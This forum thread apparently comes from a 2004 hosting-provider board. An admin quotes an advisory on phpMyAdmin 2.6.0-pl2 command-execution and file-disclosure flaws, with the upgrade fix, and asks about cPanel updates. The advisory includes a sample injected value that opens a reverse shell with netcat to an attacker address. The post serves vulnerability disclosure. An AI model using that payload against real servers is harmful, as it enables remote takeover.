The Planet Forums > phpMyAdmin remote command exploit

Full Version: phpMyAdmin remote command exploit

The Planet Forums > Control Panels > cPanel/WHM

eod

Dec 13 2004, 11:04 AM

I closely watch VulnWatch for anything exploitable on any of the servers I admin. I noticed that phpMyAdmin popped up today.

Technical details :
===================

Command execution :

- bug introduced in 2.6.0-pl2
- attacker does *not* need access to the phpMyAdmin interface
- PHP safe mode must be off
- external transformations must be activated
- sample of offensive value : F';nc -e /bin/sh $IP 80;echo 'A

File disclosure :

- attacker need access to the phpMyAdmin interface
- PHP safe mode must be off
- $cfg['UploadDir'] must be defined
- exploitation is done via 'sql_localfile'

Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.

Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.

Is phpmyadmin something that updates with our cpanel? I notice that my version is actually exploitable according to a version check.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.